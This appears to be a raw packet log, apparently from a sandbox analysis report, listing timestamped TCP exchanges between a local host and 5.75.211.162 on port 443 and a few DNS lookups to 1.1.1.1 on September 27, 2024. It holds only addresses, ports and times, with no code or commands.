Sep 27, 2024 00:29:57.776705980 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.776715040 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.776761055 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.777648926 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.777674913 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.777720928 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.777726889 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.777755976 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.777779102 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.786417961 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.786439896 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.786514044 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.786521912 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.786566019 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.795980930 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.795999050 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.796061039 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.796070099 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.796113014 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.836631060 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.836647034 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.836779118 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.836793900 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.836841106 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.837656021 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.837671041 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.837730885 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.837738991 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.837778091 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.838556051 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.838571072 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.838634014 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.838640928 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.838684082 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.865261078 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.865292072 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.865346909 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.865370035 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.865396976 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.865418911 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.870462894 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.870477915 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.870553970 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.870570898 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.870609999 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.871028900 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.871045113 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.871115923 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.871121883 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.871160984 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.881064892 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.881083012 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.881154060 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.881166935 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.881206036 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.888703108 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.888720989 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.888792038 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.888806105 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.888845921 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.936719894 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.936738968 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.936939955 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.936970949 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.937019110 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.937805891 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.937823057 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.937887907 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.937906981 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.937944889 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.939213991 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.939237118 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.939285994 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.939308882 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.939327002 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.939352989 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.979890108 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.979907036 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.980053902 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.980083942 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.980133057 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.984457970 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.984474897 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.984548092 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.984575987 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.984625101 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.985454082 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.985493898 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.985524893 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.985541105 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.985564947 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.985589981 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.994349003 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.994364023 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.994434118 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:57.994462013 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:57.994517088 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.005711079 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.005727053 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.005829096 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.005851030 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.005888939 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.060699940 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.060738087 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.060872078 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.060904026 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.060962915 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.062206984 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.062244892 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.062284946 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.062304974 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.062326908 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.062347889 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.063757896 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.063774109 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.063832045 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.063846111 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.063908100 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.119118929 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.119148970 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.119249105 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.119273901 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.119317055 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.119710922 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.119728088 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.119790077 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.119798899 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.119843006 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.120601892 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.120618105 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.120668888 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.120676994 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.120722055 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.123323917 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.131736040 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.131757975 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.131824017 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.131834984 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.131872892 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.145215988 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.145256042 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.145335913 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.145349026 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.145375967 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.145395041 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.205030918 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.205070019 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.205128908 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.205154896 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.205183983 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.205205917 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.205986977 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.206003904 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.206063986 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.206072092 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.206114054 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.207153082 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.207170010 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.207223892 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.207231045 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.207273960 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.267847061 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.267868042 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.267976046 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.268007994 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.268053055 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.269006968 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.269021988 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.269092083 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.269099951 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.269144058 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.269802094 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.269817114 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.269869089 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.269877911 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.269917965 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.280594110 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.280610085 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.280666113 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.280673981 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.280699968 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.280725956 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.286393881 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.286410093 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.286467075 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.286473989 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.286525011 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.297931910 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.297949076 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.297996998 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.298007965 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.298019886 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.298043013 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.299654961 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.299670935 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.299772024 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.299778938 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.299820900 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.300901890 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.300923109 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.300973892 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.300981045 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.301019907 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.370541096 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.370562077 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.370686054 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.370712042 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.370759964 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.371191978 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.371208906 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.371272087 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.371280909 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.371324062 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.372258902 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.372277021 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.372337103 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.372344971 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.372390985 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.373995066 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.374022007 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.374063015 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.374070883 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.374095917 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.374119043 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.378942966 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.378978968 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.379045963 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.379053116 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.379095078 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.390486956 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.390513897 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.390602112 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.390613079 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.390794039 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.391834974 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.391855955 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.392393112 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.392443895 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.392469883 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.392488003 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.392544985 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.464041948 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.464061022 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.464226961 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.464240074 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.464288950 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.464672089 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.464688063 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.464760065 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.464766979 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.464808941 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.465346098 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.465362072 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.465421915 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.465429068 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.465470076 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.466437101 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.466453075 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.466514111 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.466526985 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.466564894 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.471398115 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.471430063 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.471493006 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.471501112 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.471525908 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.471539974 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.483182907 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.483198881 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.483304977 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.483311892 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.483360052 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.484483004 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.484498978 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.484556913 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.484563112 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.484605074 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.485016108 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.485030890 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.485090971 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.485100031 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.485141993 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.556387901 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.556407928 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.556546926 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.556557894 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.556638956 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.556962967 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.556978941 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.557063103 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.557070017 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.557112932 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.557684898 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.557699919 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.557759047 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.557766914 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.557955027 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.558957100 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.558973074 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.559012890 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.559025049 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.559035063 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.559062004 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.559082031 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.559119940 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.559165001 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.559319973 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.559331894 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.573488951 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.573528051 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:58.573606014 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.573862076 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:58.573874950 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:59.255937099 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:59.256056070 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:59.256654024 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:59.256664038 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:59.258558035 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:59.258563042 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:59.258594036 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:59.258599043 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:59.964473009 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:59.964571953 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:59.964589119 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:59.964632034 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:59.964662075 CEST	443	57933	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:59.964709997 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:59.983160019 CEST	57933	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:59.983187914 CEST	443	57933	5.75.211.162	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 00:28:27.294348955 CEST	49521	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:28:27.301521063 CEST	53	49521	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:05.908171892 CEST	59699	53	192.168.2.6	1.1.1.1
